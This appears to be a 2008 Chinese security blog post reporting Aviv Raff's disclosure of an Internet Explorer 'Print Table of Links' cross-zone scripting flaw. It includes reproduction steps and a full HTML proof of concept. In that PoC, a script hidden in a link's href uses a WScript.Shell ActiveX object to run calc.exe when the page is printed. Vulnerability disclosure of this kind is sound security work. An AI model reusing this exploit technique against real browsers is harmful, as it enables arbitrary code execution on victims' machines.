首页 > 网络安全 > Aviv Raff的IE0day,公布了

Aviv Raff的IE0day,公布了

2008年5月15日 发表评论 阅读评论

来源:Sowhat的blog

前两天提到Aviv搞得这个“找”0day活动(http://hi.baidu.com/secway/blog/item/f21ad28b6bd86c7a9e2fb454.html),今天他公布细节了。

MS Internet Explorer “Print Table of Links” Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx

如果启用了 “Print Table of Links”,在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它  

重现:  
1.下面这个地方打上勾

2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。 (也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html)

<html><br /><body><br />Print me with table of links to execute calc.exe<br /><a href=”http://www.bla.com?x=b<script defer >var x=new ActiveXObject(’WScript.Shell’);x.Run(’calc.exe’);</script>a.c<u>o</u>m”></a><br /><script>window.print();</script><br /></body><br /></html>

这个漏洞大牛蛙他们据说当时很快就找出来了,应该也有很多别的同学找到了吧。

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:Aviv Raff的IE0day,公布了
本文地址:http://www.woyigui.cn/2008/05/15/Aviv-Raff-the-IE0day/

分类: 网络安全 标签:
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*